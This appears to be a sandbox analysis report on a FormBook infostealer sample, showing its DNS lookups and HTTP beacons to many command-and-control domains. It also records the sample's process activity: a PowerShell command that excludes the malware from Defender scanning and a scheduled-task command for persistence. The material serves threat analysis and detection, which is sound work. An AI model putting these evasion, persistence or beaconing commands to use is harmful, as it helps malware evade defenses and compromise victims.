                                            Nov 9, 2021 12:57:48.252391100 CET192.168.2.78.8.8.8cffe(Port unreachable)Destination Unreachable
                                            Nov 9, 2021 12:57:49.299372911 CET192.168.2.78.8.8.8cffe(Port unreachable)Destination Unreachable
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Nov 9, 2021 12:57:17.065556049 CET192.168.2.78.8.8.80xce70Standard query (0)www.sharpstead.comA (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:22.879528999 CET192.168.2.78.8.8.80x76b1Standard query (0)www.maikoufarm.comA (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:28.956065893 CET192.168.2.78.8.8.80x349cStandard query (0)www.septemberstockevent200.comA (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:34.122539997 CET192.168.2.78.8.8.80x3b78Standard query (0)www.joye.clubA (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:39.320169926 CET192.168.2.78.8.8.80xfbdaStandard query (0)www.mmj0115.xyzA (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:45.131288052 CET192.168.2.78.8.8.80xc50dStandard query (0)www.watermountsteam.topA (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:46.126441956 CET192.168.2.78.8.8.80xc50dStandard query (0)www.watermountsteam.topA (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:47.157723904 CET192.168.2.78.8.8.80xc50dStandard query (0)www.watermountsteam.topA (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:52.316186905 CET192.168.2.78.8.8.80x28abStandard query (0)www.leewaysvcs.comA (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:57.381405115 CET192.168.2.78.8.8.80x9bdcStandard query (0)www.miabellavita.comA (IP address)IN (0x0001)
                                            Nov 9, 2021 12:58:02.464620113 CET192.168.2.78.8.8.80x2f30Standard query (0)www.yungbredda.comA (IP address)IN (0x0001)
                                            Nov 9, 2021 12:58:07.645164967 CET192.168.2.78.8.8.80xa6b4Standard query (0)www.joy1263.comA (IP address)IN (0x0001)
                                            Nov 9, 2021 12:58:13.521158934 CET192.168.2.78.8.8.80x527bStandard query (0)www.mattlambert.xyzA (IP address)IN (0x0001)
                                            Nov 9, 2021 12:58:18.693773031 CET192.168.2.78.8.8.80xd29cStandard query (0)www.annikadaniel.loveA (IP address)IN (0x0001)
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Nov 9, 2021 12:57:17.257793903 CET8.8.8.8192.168.2.70xce70No error (0)www.sharpstead.com44.227.65.245A (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:17.257793903 CET8.8.8.8192.168.2.70xce70No error (0)www.sharpstead.com44.227.76.166A (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:23.134397984 CET8.8.8.8192.168.2.70x76b1No error (0)www.maikoufarm.com118.27.122.222A (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:28.979376078 CET8.8.8.8192.168.2.70x349cNo error (0)www.septemberstockevent200.com172.67.188.247A (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:28.979376078 CET8.8.8.8192.168.2.70x349cNo error (0)www.septemberstockevent200.com104.21.65.66A (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:34.145211935 CET8.8.8.8192.168.2.70x3b78No error (0)www.joye.clubjoye.clubCNAME (Canonical name)IN (0x0001)
                                            Nov 9, 2021 12:57:34.145211935 CET8.8.8.8192.168.2.70x3b78No error (0)joye.club34.102.136.180A (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:39.345231056 CET8.8.8.8192.168.2.70xfbdaNo error (0)www.mmj0115.xyz101.132.116.91A (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:47.272138119 CET8.8.8.8192.168.2.70xc50dServer failure (2)www.watermountsteam.topnonenoneA (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:48.252280951 CET8.8.8.8192.168.2.70xc50dServer failure (2)www.watermountsteam.topnonenoneA (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:49.299220085 CET8.8.8.8192.168.2.70xc50dServer failure (2)www.watermountsteam.topnonenoneA (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:52.362221003 CET8.8.8.8192.168.2.70x28abName error (3)www.leewaysvcs.comnonenoneA (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:57.404184103 CET8.8.8.8192.168.2.70x9bdcNo error (0)www.miabellavita.com104.21.4.114A (IP address)IN (0x0001)
                                            Nov 9, 2021 12:57:57.404184103 CET8.8.8.8192.168.2.70x9bdcNo error (0)www.miabellavita.com172.67.132.7A (IP address)IN (0x0001)
                                            Nov 9, 2021 12:58:02.505490065 CET8.8.8.8192.168.2.70x2f30No error (0)www.yungbredda.comyungbredda.comCNAME (Canonical name)IN (0x0001)
                                            Nov 9, 2021 12:58:02.505490065 CET8.8.8.8192.168.2.70x2f30No error (0)yungbredda.com34.102.136.180A (IP address)IN (0x0001)
                                            Nov 9, 2021 12:58:07.974133968 CET8.8.8.8192.168.2.70xa6b4No error (0)www.joy1263.coms1.amhttpproxy.comCNAME (Canonical name)IN (0x0001)
                                            Nov 9, 2021 12:58:07.974133968 CET8.8.8.8192.168.2.70xa6b4No error (0)s1.amhttpproxy.comg380-5-g-1544770457451j.greycdn.netCNAME (Canonical name)IN (0x0001)
                                            Nov 9, 2021 12:58:07.974133968 CET8.8.8.8192.168.2.70xa6b4No error (0)g380-5-g-1544770457451j.greycdn.nety01-p380-01-def-006.greycdn.netCNAME (Canonical name)IN (0x0001)
                                            Nov 9, 2021 12:58:07.974133968 CET8.8.8.8192.168.2.70xa6b4No error (0)y01-p380-01-def-006.greycdn.netz010-gp-hk-06-75-adfh31.greycdn.netCNAME (Canonical name)IN (0x0001)
                                            Nov 9, 2021 12:58:07.974133968 CET8.8.8.8192.168.2.70xa6b4No error (0)z010-gp-hk-06-75-adfh31.greycdn.net103.118.81.108A (IP address)IN (0x0001)
                                            Nov 9, 2021 12:58:13.542715073 CET8.8.8.8192.168.2.70x527bNo error (0)www.mattlambert.xyzmattlambert.xyzCNAME (Canonical name)IN (0x0001)
                                            Nov 9, 2021 12:58:13.542715073 CET8.8.8.8192.168.2.70x527bNo error (0)mattlambert.xyz34.102.136.180A (IP address)IN (0x0001)
                                            Nov 9, 2021 12:58:18.740915060 CET8.8.8.8192.168.2.70xd29cNo error (0)www.annikadaniel.loveghs.googlehosted.comCNAME (Canonical name)IN (0x0001)
                                            Nov 9, 2021 12:58:18.740915060 CET8.8.8.8192.168.2.70xd29cNo error (0)ghs.googlehosted.com142.250.203.115A (IP address)IN (0x0001)
                                            • www.sharpstead.com
                                            • www.maikoufarm.com
                                            • www.septemberstockevent200.com
                                            • www.joye.club
                                            • www.mmj0115.xyz
                                            • www.miabellavita.com
                                            • www.yungbredda.com
                                            • www.mattlambert.xyz
                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.74979444.227.65.24580C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 9, 2021 12:57:17.665894032 CET5058OUTGET /ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH HTTP/1.1
                                            Host: www.sharpstead.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 9, 2021 12:57:17.870632887 CET5100INHTTP/1.1 307 Temporary Redirect
                                            Server: openresty
                                            Date: Tue, 09 Nov 2021 11:57:17 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Content-Length: 168
                                            Connection: close
                                            Location: http://sharpstead.com
                                            X-Frame-Options: sameorigin
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.749815118.27.122.22280C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 9, 2021 12:57:23.410603046 CET5345OUTGET /ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH HTTP/1.1
                                            Host: www.maikoufarm.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 9, 2021 12:57:23.685393095 CET5346INHTTP/1.1 301 Moved Permanently
                                            Server: nginx
                                            Date: Tue, 09 Nov 2021 11:57:23 GMT
                                            Content-Type: text/html
                                            Content-Length: 162
                                            Connection: close
                                            Location: https://www.maikoufarm.com/ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.749816172.67.188.24780C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 9, 2021 12:57:29.013758898 CET5347OUTGET /ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH HTTP/1.1
                                            Host: www.septemberstockevent200.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 9, 2021 12:57:29.071464062 CET5347INHTTP/1.1 302 Moved Temporarily
                                            Date: Tue, 09 Nov 2021 11:57:29 GMT
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                            Location: https://signup.stansberryresearch.com/?cid=MKT575714&eid=MKT576461
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eaxnl2g1qB4EKNecpVvmEZi95fe%2FGSpvnSEEKHNf8qw46BnT2fmXbf9fgVuI9f4GBFQvmjjnPSXjH%2BlqUzqjL3c0AeVf%2BqzaGX0zYcrmgmh7iKR6zHtTA8vRG1dd%2BMA%2FJBGDLVQI0PIAlJ4zcKEZgmU%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 6ab6dd206aed4c32-AMS
                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                            Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.2.74981834.102.136.18080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 9, 2021 12:57:34.168477058 CET5355OUTGET /ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH HTTP/1.1
                                            Host: www.joye.club
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 9, 2021 12:57:34.283009052 CET5356INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Tue, 09 Nov 2021 11:57:34 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6182ae77-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            4192.168.2.749821101.132.116.9180C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 9, 2021 12:57:39.595240116 CET5368OUTGET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1
                                            Host: www.mmj0115.xyz
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 9, 2021 12:57:40.172657967 CET5368OUTGET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1
                                            Host: www.mmj0115.xyz
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 9, 2021 12:57:40.442859888 CET5368INHTTP/1.1 404 Not Found
                                            Date: Tue, 09 Nov 2021 11:57:40 GMT
                                            Server: Apache
                                            X-Frame-Options: SAMEORIGIN
                                            Content-Length: 203
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 74 30 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ht08/ was not found on this server.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            5192.168.2.749847104.21.4.11480C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 9, 2021 12:57:57.423017979 CET5431OUTGET /ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH HTTP/1.1
                                            Host: www.miabellavita.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 9, 2021 12:57:57.453866005 CET5431INHTTP/1.1 301 Moved Permanently
                                            Date: Tue, 09 Nov 2021 11:57:57 GMT
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Cache-Control: max-age=3600
                                            Expires: Tue, 09 Nov 2021 12:57:57 GMT
                                            Location: https://www.miabellavita.com/ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ngg2DCxHyWdHCXK0qgT%2Fa3%2Bm%2FYtqmG%2F9iEyO3FQ5JEPbD7Xr7ssk1bZaOLRNXkbYFzaeZv%2Fc0jfh9cIJoMzcws%2FjFgr2Wr36hCnXGjq50WhiMn5NSYSmW7je%2F8SZPq1zUlQ6xutJCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 6ab6ddd1fcd05c7a-FRA
                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                            Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            6192.168.2.74984834.102.136.18080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 9, 2021 12:58:02.526216030 CET5432OUTGET /ht08/?iJB=h33IU5xP+CsHIX0jyOd12cEn3mj+DYpLQqBt2JgN37c56kNOSv5/h9LYm8RBo0LsRlylinxRVA==&IfNL=N8ph5BwH HTTP/1.1
                                            Host: www.yungbredda.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 9, 2021 12:58:02.641443968 CET5433INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Tue, 09 Nov 2021 11:58:02 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6182ac26-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            7192.168.2.74985134.102.136.18080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 9, 2021 12:58:13.562832117 CET5442OUTGET /ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH HTTP/1.1
                                            Host: www.mattlambert.xyz
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 9, 2021 12:58:13.678078890 CET5442INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Tue, 09 Nov 2021 11:58:13 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6185407c-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Start time:12:56:02
                                            Start date:09/11/2021
                                            Path:C:\Users\user\Desktop\vbc.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\vbc.exe"
                                            Imagebase:0x6f0000
                                            File size:368640 bytes
                                            MD5 hash:C4A1BDD685E346B7604F93357A922875
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low
                                            Start time:12:56:05
                                            Start date:09/11/2021
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
                                            Imagebase:0x1110000
                                            File size:430592 bytes
                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Reputation:high
                                            Start time:12:56:06
                                            Start date:09/11/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff774ee0000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Start time:12:56:06
                                            Start date:09/11/2021
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp
                                            Imagebase:0xc00000
                                            File size:185856 bytes
                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Start time:12:56:07
                                            Start date:09/11/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff774ee0000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Start time:12:56:08
                                            Start date:09/11/2021
                                            Path:C:\Users\user\Desktop\vbc.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\vbc.exe
                                            Imagebase:0x7ff6e70f0000
                                            File size:368640 bytes
                                            MD5 hash:C4A1BDD685E346B7604F93357A922875
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
